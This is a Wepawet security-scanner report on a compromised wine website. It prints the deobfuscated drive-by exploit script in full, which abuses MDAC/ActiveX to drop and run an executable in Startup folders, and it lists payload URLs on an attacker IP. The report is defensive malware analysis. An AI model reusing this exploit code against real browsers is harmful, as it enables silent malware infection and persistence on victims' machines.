Wepawet

Home | About | Sample Reports | Tools | News Log in | Register

Analysis report for http://www.haakwine.com/

Sample Overview

URL	http://www.haakwine.com/
MD5	fc23e5732b039b053d6bd7a04a30fdec
Analysis Started	2009-04-16 05:45:19
Report Generated	2009-04-16 05:45:30
Jsand version	1.03.02

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
MDAC	Arbitrary file download via the Microsoft Data Access Components (MDAC)	CVE-2006-0003

Deobfuscation results

Evals

• var s = "", k = 0, u = window.location.toString(), i = u.indexOf("#");
  if (i > 0)u = u.substr(0, i);
  for (i = 0; i < a.length; i ++ ){
    s += String.fromCharCode(a[i] ^ u.charCodeAt(k));
    if (( ++ k) >= u.length)k = 0;
  }
  eval(s);
  

  (repeated 1 time)

• document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
  function b6(t){
    var d = "";
    var c1, c2, c3, e1, e2, e3, e4;
    var j = 0;
    var k = "RFDigCWfqQA=69OjMmSvJI52a17UunzrbhcNPlts03TxZVpy8/K4+XLewYoHBEGdk";
    do {
      e1 = k.indexOf(t.charAt(j ++ ));
      e2 = k.indexOf(t.charAt(j ++ ));
      e3 = k.indexOf(t.charAt(j ++ ));
      e4 = k.indexOf(t.charAt(j ++ ));
      c1 = (e1 << 2) | (e2 >> 4);
      c2 = ((e2 & 15) << 4) | (e3 >> 2);
      c3 = ((e3 & 3) << 6) | e4;
      d = d + String.fromCharCode(c1);
      if (e3 != 64)d = d + String.fromCharCode(c2);
      if (e4 != 64)d = d + String.fromCharCode(c3);
    }
    while (j < t.length);
    return d;
  }
  document.write("<script language=VBScript>Sub s1(e,fn,dt):On Error Resume Next:s1=0:" + 
  'Set k=e.CreateTextFile(fn,TRUE):if Err>0 then:Exit Function:End if:' + 
  'b="":For j=1 To LenB(dt):b=b&ChrW(Asc(Mid(dt,j,1))):Next:k.Write(b):k.Close:' + 
  "if Err>0 then:Exit Function:End if:s1=1:End Sub<\/script>");
  function f1(c, o, n){
    if (c)return c;
    var r, a, b, d, f, g, h;
    r = null;
    a = "try{r=o.";
    b = "CreateObject(n";
    d = ")}catch(e){";
    f = "GetObject(";
    g = ',""';
    h = d + a;
    eval(a + b + h + b + g + h + b + g + g + h + f + '"",n' + h + f + 'n' + g + h + f + 'n' + 
    d + '}}}}}}');
    return r
  }
  function f4(d, c){
    try {
      d[d.length] = c;
    }
    catch (e){
    }
  }
  function f2(o, t, n, d){
    for (var i = n.length - 1; i >= 0; i -- ){
      if (o)try {
        o.Type = 2;
        o.Mode = 3;
        o.Open();
        o.Charset = 'ISO-8859-1';
        o.WriteText(d);
        o.SaveToFile(n[i], 2);
        o.Close();
        return n[i];
      }
      catch (e){
      }
      if (t && window.s1 && s1(t, n[i], d))return n[i];
    }
    return 0;
  }
  function f3(){
    try {
      var a, i, m, t, v1, v2, v3, v4, d1, d2, r, d, t, f, x, s, c, b, g, h, j, k, n, p, q;
      a = null;
      m = 'BD96C556-65A3-11D0-983A-00C04FC29E3';
      f = '-0000-0000-C000-000000000046';
      var t = new Array(m + '0', m + '6', 'AB9BCEDD-EC7E-47E1-9322-D4A210617116', '0006F033'
       + f, '0006F03A' + f, '6e32070a-766d-4ee6-879c-dc1fa91d2fc3', 
      '6414512B-B978-451D-A0D8-FCFDF33E833C', '7F5B7F63-F06F-4331-8A26-339E03C0AE3D', 
      '06723E09-F4C2-43c8-8358-09FCD1DB0766', '639F725F-1B2D-4831-A9FD-874847682010', 
      'BA018599-1DB3-44f9-83B4-461454C84BF8', 'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19', 
      'E8CCCDDF-CA28-496b-B050-6C07C962476B', a);
      v1 = a;
      v2 = a;
      v3 = a;
      v4 = a;
      d1 = a;
      d2 = a;
      i = 0;
      r = 0;
      while (t[i] && (!v1 ||! v2 ||! v3 ||! v4)){
        try {
          a = document.createElement("object");
          a.setAttribute("classid", "clsid:" + t[i]);
        }
        catch (e){
          a = d1;
        }
        if (a){
          v1 = f1(v1, a, "ADODB.Stream");
          v2 = f1(v2, a, "WScript.Shell");
          v4 = f1(v4, a, "Scripting.FileSystemObject");
          v3 = f1(v3, a, "Shell.Application");
        }
        i++;
      }
      if ((v1 || v4)){
        var d = b6(ttt());
        s = 'c:';
        m = 0;
        b = "Program";
        g = "\\Uninstall.exe";
        h = "\\Autostart" + g;
        j = "Start Menu\\" + b;
        q = "Startup";
        if (v2)try {
          f = v2.Environment("PROCESS");
          s = f('HOMEDRIVE');
          m = f("TEMP");
          if (!m)m = f("TMP")
        }
        catch (e){
          s = 'c:';
          m = 0
        }
        k = "\\All Users\\";
        c = s + "\\Documents and Settings" + k;
        n = "Start";
        p = "Menu ";
        x = "Iniciar";
        d1 = new Array(c + "Menu Inicio\\" + b + "as\\Inicio" + g, c + "Menuen Start\\" + b + 
        "mer\\" + n + g, c + p + n + "\\" + b + "ma's\\Opstarten" + g, c + p + n + "\\" + b + 
        "y" + h, c + j + "lar\\BASLANGIC" + g, c + p + "Avvio\\" + b + 
        "mi\\Esecuzione automatica" + g, c + n + "-meny\\" + b + "mer\\Oppstart" + g, c + n + 
        "-menyn\\" + b + h, s + "\\Dokumente und Einstellungen" + k + n + "menu\\" + b + 
        "me" + h, c + p + x + "\\" + b + "as\\" + x + g, c + j + "s\\" + q + g);
        n = "iexplore.exe";
        k = "..\\";
        h = k + k;
        p = "\\" + n;
        if (v2){
          f4(d1, v2.SpecialFolders(q) + g);
          f4(d1, v2.SpecialFolders("AllUsers" + q) + g)
        }
        d2 = new Array(s + "\\RECYCLER" + p, h + h + n, k + h + n, h + n, k + n, n, s + p);
        n = 1;
        if (m)f4(d2, m + p);
        if (v4)f4(d2, v4.GetSpecialFolder(2) + p);
        f = f2(v1, v4, d2, d);
        if (!f){
          f = f2(v1, v4, d1, d);
          n = 0;
        }
        if (f){
          if (v3)try {
            r = 1;
            v3.ShellExecute(f)
          }
          catch (e){
            r = 0
          }
          if (!r && v2)try {
            r = 1;
            v2.Run(f, 1);
          }
          catch (e){
            try {
              v2.Exec(f)
            }
            catch (e){
              r = 0
            }
          }
          if (r)document.write("<script src=http://94.247.2.195/news/?id=9><\/script>");
          else {
            if (n)f = f2(v1, v4, d1, d);
            document.write(
            "<object classid='clsid:527196a4-b1a3-4647-931d-37ba5af23037' codebase='" + f + 
            "'></object>");
          }
        }
      }
    }
    catch (e){
    }
    return r;
  }
  f3();
  var obj = null;
  try {
    obj = new ActiveXObject("AcroPDF.PDF");
  }
  catch (e){
  }
  if (!obj){
    try {
      obj = new ActiveXObject("PDF.PdfCtrl");
    }
    catch (e){
    }
  }
  if (obj)document.write('
  <embed src="http://94.247.2.195/news/?id=2" width=100 height=100 type="application/pdf"></
  embed>');
  try {
    var FV = 0;
    FV = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" + "version"
    ).split(",");
  }
  catch (e){
  }
  if (FV && (FV[2] < 124))document.write('
  <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=mi
  ddle><param name="movie" value="http://94.247.2.195/news/?id=3"/><param name="quality" val
  ue="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://94.247.2.195/news/?id
  =3"/></embed></object>');
  document.write("</div>");
  

  (repeated 1 time)

• try {
    r = o.CreateObject(n)
  }
  catch (e){
    try {
      r = o.CreateObject(n, "")
    }
    catch (e){
      try {
        r = o.CreateObject(n, "", "")
      }
      catch (e){
        try {
          r = o.GetObject("", n)
        }
        catch (e){
          try {
            r = o.GetObject(n, "")
          }
          catch (e){
            try {
              r = o.GetObject(n)
            }
            catch (e){
            }
          }
        }
      }
    }
  }
  

  (repeated 8 times)

Writes

• <script src=//94.247.2.195/jquery.js></script>
  

  (repeated 1 time)

• <script src="http://94.247.2.195/news/?id=100"></script>
  

  (repeated 1 time)

• <div style="position:absolute; left:-1000px; top:-1000px;">
  

  (repeated 1 time)

• <script language=VBScript>Subs1(e, fn, dt) : OnErrorResumeNext : s1 = 0 : Setk = e.CreateTextFile(fn, TRUE) : if Err
   > 0then : ExitFunction : Endif  : b = "" : Forj = 1ToLenB(dt) : b = b & ChrW(Asc(Mid(dt, 
  j, 1))) : Next : k.Write(b) : k.Close : if Err > 0then : ExitFunction : Endif  : s1 = 1 : 
  EndSub</script>
  

  (repeated 1 time)

• <script src=http://94.247.2.195/news/?id=9></script>
  

  (repeated 1 time)

• <embed src="http://94.247.2.195/news/?id=2" width=100 height=100 type="application/pdf"></embed>
  

  (repeated 1 time)

• <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
  <param name="movie" value="http://94.247.2.195/news/?id=3"/><param name="quality" value="high"/>
  <param name="bgcolor" value="#ffffff"/><embed src="http://94.247.2.195/news/?id=3"/></embed>
  </object>
  

  (repeated 1 time)

• </div>
  

  (repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://www.haakwine.com/	200	text/html
http://www.haakwine.com/mm_menu.js	200	text/javascript
http://94.247.2.195/jquery.js	200	text/javascript
http://94.247.2.195/news/?id=100	200	text/javascript
http://94.247.2.195/news/?id=9	200	application/x-empty
http://94.247.2.195/news/?id=2	200	text/javascript

Redirects

No redirects.

ActiveX controls

• BD96C556-65A3-11D0-983A-00C04FC29E30
  	Name	Arg0	Count
  Methods	CreateObject	Shell.Application	1
  		Scripting.FileSystemObject	1
  		WScript.Shell	1
  		ADODB.Stream	1

• BD96C556-65A3-11D0-983A-00C04FC29E36
  	Name	Arg0	Count
  Methods	CreateObject	Shell.Application	1
  		Scripting.FileSystemObject	1
  		WScript.Shell	1
  		ADODB.Stream	1

• ADODB.STREAM
  	Name	Arg0	Arg1	Count
  Methods	WriteText	4d 5a 50 00 02 00 00 00 04 00 0f 00 c3 bf c3 bf 00 00 c2 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 other 25120 bytes 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00		1
  	SaveToFile	null\iexplore.exe	2.0	1
  	Open			1
  	Close			1
  	Name	Value		Count
  Attributes	Charset	ISO-8859-1		1
  	Type	2.0		1
  	Mode	3.0		1

• WSCRIPT.SHELL
  	Name	Arg0	Count
  Methods	Environment	PROCESS	1
  	SpecialFolders	AllUsersStartup	1
  		Startup	1

• SCRIPTING.FILESYSTEMOBJECT
  	Name	Arg0	Count
  Methods	GetSpecialFolder	2.0	1

• SHELL.APPLICATION
  	Name	Arg0	Count
  Methods	ShellExecute	null\iexplore.exe	1

• D27CDB6E-AE6D-11CF-96B8-444553540000
  	Name	Value	Count
  Attributes	bgcolor	#ffffff	1
  	quality	high	2
  	movie	index_movie.swf	1
  		http://94.247.2.195/news/?id=3	1

• ShockwaveFlash.ShockwaveFlash.9
  	Name	Arg0	Count
  Methods	GetVariable	$version	1

• AcroPDF.PDF
  No attribute setting or method call detected

• clsid:ca8a9780-280d-11cf-a24d-444553540000
  No attribute setting or method call detected

Shellcode and Malware

No shellcode was identified.

Additional (potential) malware:

URL	Type	Hash	Analysis
http://94.247.2.195/news/?id=3	N/A	N/A

© 2008–2012 The Regents of the University of California